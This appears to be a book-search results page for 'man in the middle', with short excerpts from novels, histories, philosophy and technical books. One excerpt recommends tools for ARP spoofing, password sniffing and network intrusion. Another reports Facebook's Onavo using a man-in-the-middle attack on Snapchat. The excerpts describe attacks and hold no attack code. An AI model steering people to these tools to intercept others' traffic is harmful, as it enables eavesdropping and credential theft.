Stewart Brand, systems thinking, too big to fail, trade route, Twitter Arab Spring, UNCLOS, UNCLOS, Upton Sinclair, Valery Gerasimov, We are Anonymous. We are Legion, We are as Gods, Whole Earth Catalog, WikiLeaks, Y Combinator, yellow journalism, Yochai Benkler

Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia.


pages: 661 words: 187,613

The Language Instinct: How the Mind Creates Language by Steven Pinker

Albert Einstein, Boeing 747, cloud computing, Computing Machinery and Intelligence, David Attenborough, double helix, Drosophila, elephant in my pajamas, finite state, Gregor Mendel, illegal immigration, Joan Didion, language acquisition, Loebner Prize, mass immigration, Maui Hawaii, meta-analysis, MITM: man-in-the-middle, natural language processing, out of africa, phenotype, rolodex, Ronald Reagan, Sapir-Whorf hypothesis, Saturday Night Live, speech recognition, Steven Pinker, Strategic Defense Initiative, tacit knowledge, theory of mind, transatlantic slave trade, Turing machine, Turing test, twin studies, Yogi Berra

Let loose on our page, it would create the following: * * * Socrates is a man Every man is mortal Socrates * * * Its second reflex, also in response to finding an isa, is to get itself to the right of that isa and copy any ink marks it finds there into the holes of a new cutout. In our case, this forces the processor to make a cutout in the shape of man. Its third reflex is to scan down the page checking for ink marks shaped like Every, and if it finds some, seeing if the ink marks to the right align with its new cutout. In our example, it finds one: the man in the middle of the second line. Its fourth reflex, upon finding such a match, is to move to the right and copy the ink marks it finds there onto the bottom center of the page. In our example, those are the ink marks ismortal. If you are following me, you’ll see that our page now looks like this: * * * Socrates isa man Every man ismortal Socrates ismortal * * * A primitive kind of reasoning has taken place.


pages: 816 words: 191,889

The Long Game: China's Grand Strategy to Displace American Order by Rush Doshi

"World Economic Forum" Davos, American ideology, anti-communist, Asian financial crisis, autonomous vehicles, Black Lives Matter, Bretton Woods, capital controls, coronavirus, COVID-19, crony capitalism, cross-border payments, cryptocurrency, defense in depth, deindustrialization, Deng Xiaoping, deplatforming, disinformation, Dissolution of the Soviet Union, Donald Trump, drone strike, energy security, European colonialism, eurozone crisis, financial innovation, George Floyd, global pandemic, global reserve currency, global supply chain, global value chain, Great Leap Forward, high-speed rail, Internet Archive, Internet of things, Kickstarter, kremlinology, Malacca Straits, middle-income trap, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, Network effects, Nixon triggered the end of the Bretton Woods system, offshore financial centre, positional goods, post-truth, purchasing power parity, RAND corporation, reserve currency, rolodex, Ronald Reagan, South China Sea, special drawing rights, special economic zone, TikTok, trade liberalization, transaction costs, UNCLOS, UNCLOS, undersea cable, zero-sum game

Natasha Turak, “Russia’s Central Bank Governor Touts Moscow Alternative to SWIFT Transfer System as Protection from US Sanctions,” CNBC, May 23, 2018, https://www.cnbc.com/2018/05/23/russias-central-bank-governor-touts-moscow-alternative-to-swift-transfer-system-as-protection-from-us-sanctions.html. 85Zhenhua Lu, “US House Committee Targets Major Chinese Banks’ Lifeline to North Korea,” South China Morning Post, September 13, 2017, https://www.scmp.com/news/china/policies-politics/article/2110914/us-house-committee-targets-major-chinese-banks-lifeline. 86Michelle Chen and Koh Gui Qing, “China’s International Payments System Ready, Could Launch by End-2015,” Reuters, March 9, 2015, http://www.reuters.com/article/2015/03/09/us-china-yuan-payments-exclusive-idUSKBN0M50BV20150309. 87Don Weinland, “China’s Global Payment System CIPs Too Costly for Most Banks—For Now,” South China Morning Post, October 17, 2015, https://www.scmp.com/business/banking-finance/article/1868749/chinas-global-payment-system-cips-too-costly-most-banks-now. 88Gabriel Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns,” Financial Times, October 8, 2015, https://www.ft.com/content/84241292-66a1-11e5-a155-02b6f8af6a62. 89Prasad, Gaining Currency, 116. 90China and the Age of Strategic Rivalry (Ottawa: Canadian Security Intelligence Services, 2018), 113–22. 91Stefania Palma, “SWIFT Dips into China with CIPS,” The Banker, July 1, 2016, https://www.thebanker.com/Global-Transaction-Banking/Swift-dips-into-China-with-CIPS. 92“Beijing’s International Payments System Scaled Back for Launch,” South China Morning Post, July 23, 2015, https://www.scmp.com/business/money/article/1838428/beijings-international-payments-system-scaled-back-launch. 93Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns.” 94China and the Age of Strategic Rivalry, 113–22. 95Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns.” 96Bershidsky, “How Europe Can Keep the Money Flowing to Iran.” 97“EU Criticizes Role of US Credit Rating Agencies in Debt Crisis,” Deutsche Welle, July 11, 2011, https://www.dw.com/en/eu-criticizes-role-of-us-credit-rating-agencies-in-debt-crisis/a-15225330. 98Huw Jones and Marc Jones, “EU Watchdog Tightens Grip over Use of Foreign Credit Ratings,” Reuters, November 17, 2017, https://www.reuters.com/article/us-britain-eu-creditratingagencies/eu-watchdog-tightens-grip-over-use-of-foreign-credit-ratings-idUSKBN1DH1J1. 99“China’s Finance Minister Accuses Credit Rating Agencies of Bias,” South China Morning Post, April 16, 2016, https://www.scmp.com/news/china/economy/article/1936614/chinas-finance-minister-accuses-credit-rating-agencies-bias; Joe McDonald, “China Criticizes S&P Rating Cut as ‘Wrong Decision,’” Associated Press, September 22, 2017, https://apnews.com/743f86862f5a4b85844dcc10f96e3f8c. 100Guan Jianzhong, “The Strategic Choice of Chinese Credit Rating System,” Dagong Global (via Internet Archive), 2012, https://web.archive.org/web/20160805110146/http://en.dagongcredit.com/content/details58_6631.html. 101Ibid. 102“Man in the Middle,” South China Morning Post, April 26, 2014, https://www.scmp.com/business/china-business/article/1497241/man-middle. 103Ibid. 104Liz Mak, “China’s Dagong Global Credit Mounts Challenge to ‘Big Three’ Rating Agencies,” South China Morning Post, August 7, 2016, https://www.scmp.com/business/banking-finance/article/2000489/chinas-dagong-global-credit-mounts-challenge-big-three. 105Reports of Guan’s government ties are discussed in Christopher Ricking, “US Rating Agencies Face Chinese Challenge,” Deutsche Welle, November 19, 2012, https://www.dw.com/en/us-ratings-agencies-face-chinese-challenge/a-16389497; Guan Jianzhong, “The Strategic Choice of Chinese Credit Rating System.” 106Asit Ranjan Mishra, “China Not in Favor of BRICS Proposed Credit Rating Agency,” Livemint, October 14, 2014, https://www.livemint.com/Politics/btAFFggl1LoKBNZK0a45fJ/China-not-in-favour-of-proposed-Brics-credit-rating-agency.html. 107“Corporate Culture,” Dagong Global (via Internet Archive), 2016, https://web.archive.org/web/20160704062906/http://en.dagongcredit.com:80/about/culture.html. 108“About Us,” Dagong Global (via Internet Archive), 2016, https://web.archive.org/web/20160326131607/http://en.dagongcredit.com/about/aboutDagong.html.


pages: 659 words: 203,574

The Collected Stories of Vernor Vinge by Vernor Vinge

anthropic principle, Asilomar, back-to-the-land, dematerialisation, gravity well, invisible hand, Ivan Sutherland, low earth orbit, Machinery of Freedom by David Friedman, MITM: man-in-the-middle, source of truth, technological singularity, unbiased observer, Vernor Vinge

Behind her, Grandmother stared in shocked silence. Sanda spun and ran toward the kitchen. Once they had the intruders locked out, what could she and Gran do without a phone? She nearly ran into him in the kitchen. Sanda sucked in a breath so hard she squeaked. He was big and hooded. He also had a knife. Strange to see such a man in the middle of the glistening white kitchen—the homey, comforting, safe kitchen. From the living room came the sound of splintering wood and Grandmother screamed. Running footsteps. Something metal being kicked over. Grandmother screamed again. “Shut your mouth, lady. I said, shut it.” The voice—though not the tone—was vaguely familiar.


Ubuntu 15.04 Server with systemd: Administration and Reference by Richard Petersen

Amazon Web Services, bash_history, cloud computing, Debian, Firefox, lock screen, Mark Shuttleworth, MITM: man-in-the-middle, OpenAI, operational security, RFC: Request For Comment, SpamAssassin, web application

The traceroute command will return a list of hosts the route traverses, along with the times for three probes sent to each gateway. Times greater than five seconds are displayed with a asterisk, *. traceroute rabbit.mytrek.com You can also use the mtr or xmtr tools to perform both ping and traces (Traceroute on the System Tools menu). Ettercap Ettercap is a sniffer program designed to detect Man in the Middle attacks. In this kind of attack, packets are detected and modified in transit to let an unauthorized user access a network. You can use either its graphical interface or its command line interface. Ettercap can perform Unified sniffing on all connections, or Bridged sniffing on a connection between network interfaces.


pages: 840 words: 202,245

Age of Greed: The Triumph of Finance and the Decline of America, 1970 to the Present by Jeff Madrick

Abraham Maslow, accounting loophole / creative accounting, Alan Greenspan, AOL-Time Warner, Asian financial crisis, bank run, Bear Stearns, book value, Bretton Woods, business cycle, capital controls, Carl Icahn, collapse of Lehman Brothers, collateralized debt obligation, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, currency risk, desegregation, disintermediation, diversified portfolio, Donald Trump, financial deregulation, fixed income, floating exchange rates, Frederick Winslow Taylor, full employment, George Akerlof, Glass-Steagall Act, Greenspan put, Hyman Minsky, income inequality, index fund, inflation targeting, inventory management, invisible hand, John Bogle, John Meriwether, junk bonds, Kitchen Debate, laissez-faire capitalism, locking in a profit, Long Term Capital Management, low interest rates, market bubble, Mary Meeker, Michael Milken, minimum wage unemployment, MITM: man-in-the-middle, Money creation, money market fund, Mont Pelerin Society, moral hazard, mortgage debt, Myron Scholes, new economy, Nixon triggered the end of the Bretton Woods system, North Sea oil, Northern Rock, oil shock, Paul Samuelson, Philip Mirowski, Phillips curve, price stability, quantitative easing, Ralph Nader, rent control, road to serfdom, Robert Bork, Robert Shiller, Ronald Coase, Ronald Reagan, Ronald Reagan: Tear down this wall, scientific management, shareholder value, short selling, Silicon Valley, Simon Kuznets, tail risk, Tax Reform Act of 1986, technology bubble, Telecommunications Act of 1996, The Chicago School, The Great Moderation, too big to fail, union organizing, V2 rocket, value at risk, Vanguard fund, War on Poverty, Washington Consensus, Y2K, Yom Kippur War

Financial writer Michael Lewis, then a Salomon novice, in his first-person account of working at Salomon Brothers in these years, quoted Dall as saying of Ranieri, “He was tough-minded. He didn’t mind hiding a million-dollar loss from a manager, if that’s what it took. He didn’t let morality get in his way. Well, morality is not the right word, but you know what I mean.” Trading was the key to profits in the new mortgage department. Ranieri, the man in the middle, had the information about supply and demand and also the deep financial pockets of a house like Salomon. Ranieri was not merely aggressive and willing to cut corners; he was by every account smart. “I have never seen anyone, educated or uneducated, with a quicker mind,” said Dall, whom Ranieri eventually forced out of the department.


pages: 706 words: 202,591

Facebook: The Inside Story by Steven Levy

active measures, Airbnb, Airbus A320, Amazon Mechanical Turk, AOL-Time Warner, Apple's 1984 Super Bowl advert, augmented reality, Ben Horowitz, Benchmark Capital, Big Tech, Black Lives Matter, Blitzscaling, blockchain, Burning Man, business intelligence, Cambridge Analytica, cloud computing, company town, computer vision, crowdsourcing, cryptocurrency, data science, deep learning, disinformation, don't be evil, Donald Trump, Dunbar number, East Village, Edward Snowden, El Camino Real, Elon Musk, end-to-end encryption, fake news, Firefox, Frank Gehry, Geoffrey Hinton, glass ceiling, GPS: selective availability, growth hacking, imposter syndrome, indoor plumbing, information security, Jeff Bezos, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, lock screen, Lyft, machine translation, Mahatma Gandhi, Marc Andreessen, Marc Benioff, Mark Zuckerberg, Max Levchin, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, natural language processing, Network effects, Oculus Rift, operational security, PageRank, Paul Buchheit, paypal mafia, Peter Thiel, pets.com, post-work, Ray Kurzweil, recommendation engine, Robert Mercer, Robert Metcalfe, rolodex, Russian election interference, Salesforce, Sam Altman, Sand Hill Road, self-driving car, sexual politics, Sheryl Sandberg, Shoshana Zuboff, side project, Silicon Valley, Silicon Valley startup, skeuomorphism, slashdot, Snapchat, social contagion, social graph, social software, South of Market, San Francisco, Startup school, Steve Ballmer, Steve Bannon, Steve Jobs, Steven Levy, Steven Pinker, surveillance capitalism, tech billionaire, techlash, Tim Cook: Apple, Tragedy of the Commons, web application, WeWork, WikiLeaks, women in the workforce, Y Combinator, Y2K, you are the product

Facebook now had a powerful way to monitor the mobile activity of thousands of users. The Growth team would study the data carefully, and post results in their regular meetings. Onavo paid special attention to Snapchat. Evan Spiegel’s company had security features to block intruders, but according to one Facebook executive, Onavo used a “man-in-the-middle” attack to get past the wall and gather data. Snapchat discovered this and put in protections to thwart the intrusions. With Onavo, a Facebook executive confirmed to me, the company was “able to inject code into Snap and could see how people were actually using the product internally.” (According to The Wall Street Journal, Snapchat would add this episode to a file it kept of Facebook’s actions, calling it “Project Voldemort,” after the Harry Potter villain whose name cannot be spoken.)


pages: 685 words: 203,431

The Story of Philosophy by Will Durant

George Santayana, Gregor Mendel, Henri Poincaré, Isaac Newton, long peace, mass immigration, means of production, MITM: man-in-the-middle, music of the spheres, Plato's cave, plutocrats, science of happiness, Socratic dialogue, the market place, the scientific method

Sometimes this is well; for if we are conscious of erring in one extreme “we should aim at the other, and so we may reach the middle position, . . . as men do in straightening bent timber.”53 But unconscious extremists look upon the golden mean as the greatest vice; they “expel towards each other the man in the middle position; the brave man is called rash by the coward, and cowardly by the rash man, and in other cases accordingly”;54 so in modern politics the “liberal” is called “conservative” and “radical” by the radical and the conservative. It is obvious that this doctrine of the mean is the formulation of a characteristic attitude which appears in almost every system of Greek philosophy.


pages: 747 words: 218,317

Look Homeward, Angel by Thomas Wolfe

cakes and ale, cotton gin, fear of failure, index card, MITM: man-in-the-middle, Own Your Own Home

You're doing good work, my boy, and you're getting something out of it. It's worth it, isn't it?" "Yes," said Eugene gratefully, "it certainly is--" By far the most distinguished of his teachers this first year was Mr. Edward Pettigrew ("Buck") Benson, the Greek professor. Buck Benson was a little man in the middle-forties, a bachelor, somewhat dandified, but old-fashioned, in his dress. He wore wing collars, large plump cravats, and suede-topped shoes. His hair was thick, heavily grayed, beautifully kept. His face was courteously pugnacious, fierce, with large yellow bulging eyeballs, and several bulldog pleatings around the mouth.


pages: 669 words: 210,153

Tools of Titans: The Tactics, Routines, and Habits of Billionaires, Icons, and World-Class Performers by Timothy Ferriss

Abraham Maslow, Adam Curtis, Airbnb, Alexander Shulgin, Alvin Toffler, An Inconvenient Truth, artificial general intelligence, asset allocation, Atul Gawande, augmented reality, back-to-the-land, Ben Horowitz, Bernie Madoff, Bertrand Russell: In Praise of Idleness, Beryl Markham, billion-dollar mistake, Black Swan, Blue Bottle Coffee, Blue Ocean Strategy, blue-collar work, book value, Boris Johnson, Buckminster Fuller, business process, Cal Newport, call centre, caloric restriction, caloric restriction, Carl Icahn, Charles Lindbergh, Checklist Manifesto, cognitive bias, cognitive dissonance, Colonization of Mars, Columbine, commoditize, correlation does not imply causation, CRISPR, David Brooks, David Graeber, deal flow, digital rights, diversification, diversified portfolio, do what you love, Donald Trump, effective altruism, Elon Musk, fail fast, fake it until you make it, fault tolerance, fear of failure, Firefox, follow your passion, fulfillment center, future of work, Future Shock, Girl Boss, Google X / Alphabet X, growth hacking, Howard Zinn, Hugh Fearnley-Whittingstall, Jeff Bezos, job satisfaction, Johann Wolfgang von Goethe, John Markoff, Kevin Kelly, Kickstarter, Lao Tzu, lateral thinking, life extension, lifelogging, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Mason jar, Menlo Park, microdosing, Mikhail Gorbachev, MITM: man-in-the-middle, Neal Stephenson, Nelson Mandela, Nicholas Carr, Nick Bostrom, off-the-grid, optical character recognition, PageRank, Paradox of Choice, passive income, pattern recognition, Paul Graham, peer-to-peer, Peter H. Diamandis: Planetary Resources, Peter Singer: altruism, Peter Thiel, phenotype, PIHKAL and TIHKAL, post scarcity, post-work, power law, premature optimization, private spaceflight, QWERTY keyboard, Ralph Waldo Emerson, Ray Kurzweil, recommendation engine, rent-seeking, Richard Feynman, risk tolerance, Ronald Reagan, Salesforce, selection bias, sharing economy, side project, Silicon Valley, skunkworks, Skype, Snapchat, Snow Crash, social graph, software as a service, software is eating the world, stem cell, Stephen Hawking, Steve Jobs, Stewart Brand, superintelligent machines, TED Talk, Tesla Model S, The future is already here, the long tail, The Wisdom of Crowds, Thomas L Friedman, traumatic brain injury, trolley problem, vertical integration, Wall-E, Washington Consensus, We are as Gods, Whole Earth Catalog, Y Combinator, zero-sum game

To learn about some of the starting tools a hacker, attacker, or someone just curious about security would use, I’d suggest looking at beginning tools such as Wireshark, Charles (web debugging proxy), NightHawk (ARP/ND spoofing and password sniffing), arpy (ARP spoofing), dsniff (password sniffing), and Kali Linux (penetration testing) and looking up tutorials on network intrusion, sniffing, and man-in-the-middling. Within a few minutes and with a tool like Wireshark, you can start seeing all the traffic going in and out of your computer, while tools like Nighthawk and arpy in conjunction with Wireshark can help you inspect and intercept all traffic on a network! To further dive into security, I’d suggest learning to program.


The Oil Kings: How the U.S., Iran, and Saudi Arabia Changed the Balance of Power in the Middle East by Andrew Scott Cooper

addicted to oil, Alan Greenspan, An Inconvenient Truth, anti-communist, Ayatollah Khomeini, banking crisis, Boycotts of Israel, energy security, falling living standards, friendly fire, full employment, Future Shock, Great Leap Forward, guns versus butter model, interchangeable parts, Kickstarter, land reform, MITM: man-in-the-middle, oil shale / tar sands, oil shock, peak oil, Ponzi scheme, Post-Keynesian economics, RAND corporation, rising living standards, Robert Bork, rolodex, Ronald Reagan, Seymour Hersh, strikebreaker, unbiased observer, uranium enrichment, urban planning, Yom Kippur War

Ford Library. 284 $20 million over five years: Pranay Gupte, “Lobbyists in Iran Paid by Grumman,” New York Times, December 13, 1975. 284 “It was normal practice”: Ibid. 284 Members of Congress demanded to know: Ibid. 284 second $200 million loan offered: Ibid. 284 an audit prepared by Northrop Corporation’s accounting firm: Ibid. 284 $200 million in kickbacks: Michael C. Jensen, “Bribes by Northrop of $450,000 for 2 Saudi Generals Reported,” New York Times, June 5, 1975. 284 Prominent among the “sales agents”: William H. Jones, “Northrop’s Man in the Middle East,” Washington Post, June 7, 1975. 284 leveraged his background in intelligence: David Binder, “Northrop Cites Undercover Role,” New York Times, June 7, 1975. 284 “running close to a billion dollars”: Ibid. 284 “old personal friend”: Ibid. 284 “The Shah could not have been more cordial personally”: Ibid. 284 Roosevelt to ask the Shah to lobby: Gaylord Shaw, “Senate Unit Tells of More Northrop Payoffs Abroad,” Los Angeles Times, June 7, 1975. 285 paid $2,697,067: Martin R.


pages: 807 words: 225,326

Werner Herzog - a Guide for the Perplexed: Conversations With Paul Cronin by Paul Cronin

Albert Einstein, Atahualpa, Berlin Wall, classic study, Dr. Strangelove, Francisco Pizarro, Kickstarter, land reform, MITM: man-in-the-middle, out of africa, Pier Paolo Pasolini

He and a co-conspirator were about to be busted, so he started pushing his colleague aggressively, shouting things like, “You’re doing a lousy job! What’s the matter with you? I told you Tuesday, not Wednesday!” The two of them stormed off and the guard didn’t dare say anything. No one wants to interfere with a man in the middle of a fight. Philippe pointed out that the opposite also works, that people won’t bother you when you’re laughing your heart out. A participant at one Rogue session was a former hostage negotiator; he’ll surely make a fine filmmaker. Another told us the story of a film he was making in Portugal about street kids.


America in the World by Robert B. Zoellick

Albert Einstein, anti-communist, banking crisis, battle of ideas, Berlin Wall, Bretton Woods, British Empire, classic study, Corn Laws, coronavirus, cuban missile crisis, defense in depth, Deng Xiaoping, Donald Trump, Douglas Engelbart, Douglas Engelbart, energy security, European colonialism, facts on the ground, Fall of the Berlin Wall, foreign exchange controls, Great Leap Forward, guns versus butter model, hypertext link, Ida Tarbell, illegal immigration, immigration reform, imperial preference, Isaac Newton, Joseph Schumpeter, land reform, linear model of innovation, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, Nixon triggered the end of the Bretton Woods system, Norbert Wiener, Paul Samuelson, public intellectual, RAND corporation, reserve currency, Ronald Reagan, Ronald Reagan: Tear down this wall, scientific management, Scramble for Africa, Silicon Valley, Strategic Defense Initiative, The Wealth of Nations by Adam Smith, trade liberalization, transcontinental railway, undersea cable, Vannevar Bush, War on Poverty

Vandenberg: From Isolation to International Engagement (Lexington, KY: University Press of Kentucky, 2015), 87 (citing Vandenberg’s papers) and 169. 40. See Haas, Harry and Arthur, 2 for forty-seven days; Kaplan, Conversion, 1–3 (citing James Reston in 1948 on “qualities of enterprise”); and Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 4–6, 70, 119. 41. Meijer, Vandenberg, 4. 42. Meijer, Vandenberg, 6–9; Kaplan, Conversion, 2–4. 43. Kaplan, Conversion, 3–4, 8, 11–14; Meijer, Vandenberg, 16. 44. Vandenberg believed that Alexander Hamilton represented a superior mix of nationalism, conservativism, and progressivism.


pages: 903 words: 235,753

The Stack: On Software and Sovereignty by Benjamin H. Bratton

1960s counterculture, 3D printing, 4chan, Ada Lovelace, Adam Curtis, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Robotics, Amazon Web Services, Andy Rubin, Anthropocene, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, Biosphere 2, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, capitalist realism, carbon credits, carbon footprint, carbon tax, carbon-based life, Cass Sunstein, Celebration, Florida, Charles Babbage, charter city, clean water, cloud computing, company town, congestion pricing, connected car, Conway's law, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, digital capitalism, digital divide, disintermediation, distributed generation, don't be evil, Douglas Engelbart, Douglas Engelbart, driverless car, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, Evgeny Morozov, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, fulfillment center, functional programming, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, high-speed rail, Hyperloop, Ian Bogost, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, James Bridle, Jaron Lanier, Joan Didion, John Markoff, John Perry Barlow, Joi Ito, Jony Ive, Julian Assange, Khan Academy, Kim Stanley Robinson, Kiva Systems, Laura Poitras, liberal capitalism, lifelogging, linked data, lolcat, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megaproject, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Neal Stephenson, Network effects, new economy, Nick Bostrom, ocean acidification, off-the-grid, offshore financial centre, oil shale / tar sands, Oklahoma City bombing, OSI model, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, pneumatic tube, post-Fordism, precautionary principle, RAND corporation, recommendation engine, reserve currency, rewilding, RFID, Robert Bork, Sand Hill Road, scientific management, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, skeuomorphism, Slavoj Žižek, smart cities, smart grid, smart meter, Snow Crash, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, synthetic biology, TaskRabbit, technological determinism, TED Talk, the built environment, The Chicago School, the long tail, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, vertical integration, warehouse automation, warehouse robotics, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator, yottabyte

For Sino-Google geopolitics, the platform could theoretically be available at a billion-user scale to those who live in China, even if Google is not technically “in China,” because those Users, acting through and as foreign proxies, are themselves, as far as the Internet geography is concerned, both in and not in China. Developers of uProxy believe that it would take two simultaneous and synchronized man-in-the-middle attacks to hack the link, and at population scale, that should prove difficult even for the best state actors, for now. (More disconcerting perhaps is that such a framework could just as easily be used to withdraw data from a paired site—a paired “user”—that for good reasons should be left alone.)


pages: 965 words: 267,053

A History of Zionism by Walter Laqueur

Albert Einstein, anti-communist, British Empire, business cycle, illegal immigration, joint-stock company, land reform, Mahatma Gandhi, mass immigration, means of production, MITM: man-in-the-middle, Mount Scopus, new economy, plutocrats, profit motive, strikebreaker, Suez canal 1869, the market place, éminence grise

Many liberals and Socialists felt that national distinctions were losing their importance all over the world, and that the Jews, because they had no national home, would be in the vanguard of this movement towards one global culture, one way of life. They did not share the belief that God had created peoples to exist forever and that each of them had an eternal mission. One of the heroes in Gottfried Keller’s Fähnlein der sieben Aufrechten, a stalwart Swiss patriot, raised the question in discussion with his friends: Just as a man in the middle of his life and at the height of his strength will think of death, so he should consider in a quiet hour that his fatherland will vanish one day … because everything in this world is subject to change … is it not true that greater nations than ours have perished? Or do you want to continue existing like the Eternal Jew who cannot die, who has buried Egypt, Greece, and Rome and is still serving the newly emerged peoples?


George Marshall: Defender of the Republic by David L. Roll

anti-communist, Bletchley Park, British Empire, Charles Lindbergh, Cornelius Vanderbilt, David Brooks, Defenestration of Prague, Donald Trump, European colonialism, fear of failure, invisible hand, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, one-China policy, one-state solution, Ralph Waldo Emerson, Simon Kuznets, South China Sea, Steve Jobs, Suez canal 1869, trade liberalization, Works Progress Administration, yellow journalism

Louis Johnson and the Arming of America: The Roosevelt and Truman Years. Bloomington: Indiana University Press, 2005. Medoff, Rafael. Jewish Americans and Political Participation. Santa Barbara, CA: ABC-CLIO, 2002. Mee, Charles L. Jr. The Marshall Plan. New York: Simon & Schuster, 1984. Meijer, Hendrik. Arthur Vandenberg: The Man in the Middle of the American Century. Chicago: University of Chicago Press, 2017. Melby, John F. The Mandate of Heaven: Record of a Civil War, China 1945–49. Garden City, NY: Anchor Books, 1971. Miller, Merle. Plain Speaking: An Oral Biography of Harry S. Truman. New York: Black Dog & Leventhal, 2005.


pages: 1,212 words: 312,349

Dhalgren by Samuel R. Delany

MITM: man-in-the-middle, sexual politics

A climb across rocks and among green brush jarred it loose again. Cathedral told Priest the black stone building in the smoke was the Weather Tower. I still don't see any vanes, aerials, or anemometers. We came around a corner, left hips brushing head-sized stones, right hips (elbows up) scratched by bushes. The man in the middle of the court was bent over a tripod. As we came toward him, he looked up: Captain Kamp. Who still didn't recognize me until we were on top of him. "…Kid?" "Hello, Captain." He laughed now. "Now you fellows looked pretty ominous coming across there." He debated whether to give his hand for shaking.


pages: 1,327 words: 360,897

Demanding the Impossible: A History of Anarchism by Peter Marshall

agricultural Revolution, anti-communist, anti-globalists, Bertrand Russell: In Praise of Idleness, classic study, clean water, collective bargaining, colonial rule, David Graeber, different worldview, do-ocracy, feminist movement, garden city movement, gentleman farmer, Great Leap Forward, Herbert Marcuse, hive mind, Howard Zinn, intentional community, invisible hand, laissez-faire capitalism, land reform, land tenure, Lao Tzu, Lewis Mumford, liberation theology, Machinery of Freedom by David Friedman, Mahatma Gandhi, means of production, military-industrial complex, MITM: man-in-the-middle, Murray Bookchin, Naomi Klein, open borders, Panopticon Jeremy Bentham, plutocrats, post scarcity, profit motive, public intellectual, radical decentralization, Ralph Waldo Emerson, rewilding, road to serfdom, Ronald Reagan, sexual politics, the market place, union organizing, wage slave, washing machines reduced drudgery

Woodcock has suggested that in their view of man’s place in the world, anarchists believed in a modified version of the Great Chain of Being.9 In fact, the conception of the universe as a Chain of Being, and the principles which underline this conception — plenitude, continuity, and gradation — were deeply conservative. Moreover, the hierarchical cosmogony of the Chain of Being, with its gradations from beast to angels with man in the middle, reflected the social hierarchy of the period. In the eighteenth century, it led to the belief that there could be no improvement in the organization of society and to Pope’s conclusion that ‘whatever is, is right’.10 Indeed, it was only towards the end of the eighteenth century when the static notion of a Chain of Being was temporalized and replaced by a more evolutionary view of nature that progressive thinkers began to appeal to nature as a touchstone to illustrate the shortcomings of modern civilization.


pages: 1,318 words: 403,894

Reamde by Neal Stephenson

air freight, airport security, autism spectrum disorder, book value, crowdsourcing, digital map, drone strike, Google Earth, industrial robot, informal economy, Jones Act, large denomination, megacity, messenger bag, MITM: man-in-the-middle, Neal Stephenson, new economy, off-the-grid, pattern recognition, Ponzi scheme, pre–internet, ransomware, restrictive zoning, scientific management, side project, Skype, slashdot, Snow Crash, South China Sea, SQL injection, the built environment, the scientific method, young professional

Sokolov was leading the way, but as they passed 503 he looked over his shoulder and made room for Kautsky, the biggest man in the squad, the door breaker. Kautsky was armed with a combination sledge-hammer/ax/crowbar that could make short work of any door. The ones in this building looked particularly flimsy, so Sokolov had no worries about getting through rapidly. Kautsky would be their man in the middle, the first one through, who would hold the center and block the exit while the others flooded in behind him and flowed to the edges. Ivanov had no scripted part in this plan, since he was supposed to be waiting down in the van, but Sokolov hoped that he would have the good sense to stay well to the rear, in the hallway, long enough for things to get under control.


pages: 1,199 words: 384,780

The system of the world by Neal Stephenson

bank run, British Empire, cellular automata, Edmond Halley, Fellow of the Royal Society, high net worth, Isaac Newton, James Watt: steam engine, joint-stock company, land bank, large denomination, MITM: man-in-the-middle, Neal Stephenson, place-making, Snow Crash, the market place, three-masted sailing ship, trade route, transatlantic slave trade

Indeed many were now staring at it, for it was smoking. And it was making booms as the passenger flailed against the roof, signalling the driver to stop. The door on the right side flew open and disgorged a cloud of brown-gray smoke. So dense and voluminous was this, that a long and careful inspection was needed to see that there was a man in the middle of it. He was staggering away from the carriage, headed for the parapet that surrounded the Square to limit the number of pedestrians who toppled into St. Mary’s Lock. The passenger looked like a figure from Ovid: a Cloud metamorphosing into a Man. For the smoke had saturated the long hooded cloak that he wore, and was still billowing out of it.


pages: 1,060 words: 265,296

Wealth and Poverty of Nations by David S. Landes

